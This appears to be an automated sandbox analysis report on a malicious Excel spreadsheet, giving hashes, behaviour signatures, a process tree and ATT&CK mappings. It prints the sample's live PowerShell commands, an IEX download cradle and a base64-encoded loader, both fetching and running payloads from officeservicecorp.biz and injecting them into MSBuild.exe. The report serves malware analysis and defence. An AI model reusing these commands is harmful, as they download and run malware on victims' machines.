612f288a358f6bfabc74937c10086107bede804413a5f6fd9e8f24f819669a0e

General

Target

WACKER - 000160847.xls
Size

1.1MB
MD5

9e2c88810138b0856bda192ae70d34c4
SHA1

579853532fadf08ef8ed7369d6d596af619bdf5a
SHA256

612f288a358f6bfabc74937c10086107bede804413a5f6fd9e8f24f819669a0e
SHA512

eb6d05e14c0fcf4747970f3c1d9f227837a3ff04b88c5ad802c643453ee4978e4e080575016f4210e934d27a967e80cbf7c29f0e375a810be5067c94b52f1318

Score

10^/10

evasion spyware trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://officeservicecorp.biz/Lab.jpg

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1072 EXCEL.EXE

pid	process
1072	EXCEL.EXE

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

EXCEL.EXEpowershell.exepowershell.exe

description	pid	process	target process
PID 1072 wrote to memory of 1432	1072	EXCEL.EXE	powershell.exe
PID 1072 wrote to memory of 1432	1072	EXCEL.EXE	powershell.exe
PID 1072 wrote to memory of 1432	1072	EXCEL.EXE	powershell.exe
PID 1432 wrote to memory of 1548	1432	powershell.exe	powershell.exe
PID 1432 wrote to memory of 1548	1432	powershell.exe	powershell.exe
PID 1432 wrote to memory of 1548	1432	powershell.exe	powershell.exe
PID 1548 wrote to memory of 1260	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1260	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1260	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1260	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1808	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1808	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1808	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1808	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1836	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1836	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1836	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1836	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1792	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1792	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1792	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1792	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1816	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1816	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1816	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1816	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1784	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1784	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1784	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1784	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1760	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1760	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1760	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1760	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1692	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1692	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1692	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1692	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1660	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1660	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1660	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1660	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1584	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1584	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1584	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1584	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1600	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1600	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1600	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1600	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1608	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1608	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1608	1548	powershell.exe	MSBuild.exe
PID 1548 wrote to memory of 1608	1548	powershell.exe	MSBuild.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

1072 EXCEL.EXE
1072 EXCEL.EXE

pid	process
1072	EXCEL.EXE
1072	EXCEL.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

1072 EXCEL.EXE
1072 EXCEL.EXE
1072 EXCEL.EXE

pid	process
1072	EXCEL.EXE
1072	EXCEL.EXE
1072	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1432	1072	powershell.exe	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1432 powershell.exe
Token: SeDebugPrivilege 1548 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exe

pid	process
1432	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe

Blacklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

5 1432 powershell.exe
7 1548 powershell.exe
8 1548 powershell.exe

flow	pid	process
5	1432	powershell.exe
7	1548	powershell.exe
8	1548	powershell.exe

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\WACKER - 000160847.xls"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://officeservicecorp.biz/Lab.jpg')
2⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JABQAHMAYgBiAFkAVgBsAGIAawAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABUAFMAUQBuAEIAegBJAEIAYQBlAFoAcwBIAG4ASABvAGkAUQBiAG8ATwB1AFYAbQBQAFAAcABPAEQAbwBmAGcARABEAFIATwBGAGYAQQB2AEoAYQB0AFgAZQBnAHgAdwBuAFoAaQBrAHQAcABtAG4AQwBxAEYAaABsAE0AaQBwAEoAWQBRAFYAQwB5AHoAUwBJAHEAYwBmAGUAdwB2AGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAFAAcwBiAGIAWQBWAGwAYgBrACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AbwBmAGYAaQBjAGUAcwBlAHIAdgBpAGMAZQBjAG8AcgBwAC4AYgBpAHoALwByAG4AcAAuAHQAeAB0ACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAVABTAFEAbgBCAHoASQBCAGEAZQBaAHMASABuAEgAbwBpAFEAYgBvAE8AdQBWAG0AUABQAHAATwBEAG8AZgBnAEQARABSAE8ARgBmAEEAdgBKAGEAdABYAGUAZwB4AHcAbgBaAGkAawB0AHAAbQBuAEMAcQBGAGgAbABNAGkAcABKAFkAUQBWAEMAeQB6AFMASQBxAGMAZgBlAHcAdgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAUABzAGIAYgBZAFYAbABiAGsALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAG8AZgBmAGkAYwBlAHMAZQByAHYAaQBjAGUAYwBvAHIAcAAuAGIAaQB6AC8AZgBpAGwAZQAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcAMAB4ACcAKQB8AEkARQBYADsAWwBDAC4ATQBdADoAOgBSACgAJwBNAFMAQgB1AGkAbABkAC4AZQB4AGUAJwAsACQAVABTAFEAbgBCAHoASQBCAGEAZQBaAHMASABuAEgAbwBpAFEAYgBvAE8AdQBWAG0AUABQAHAATwBEAG8AZgBnAEQARABSAE8ARgBmAEEAdgBKAGEAdABYAGUAZwB4AHcAbgBaAGkAawB0AHAAbQBuAEMAcQBGAGgAbABNAGkAcABKAFkAUQBWAEMAeQB6AFMASQBxAGMAZgBlAHcAdgApAA==
3⤵
- Suspicious use of WriteProcessMemory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1548

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1260

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1760

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1584

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1608

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Download Submit
memory/1432-0-0x0000000000000000-mapping.dmp

Download
memory/1548-1-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads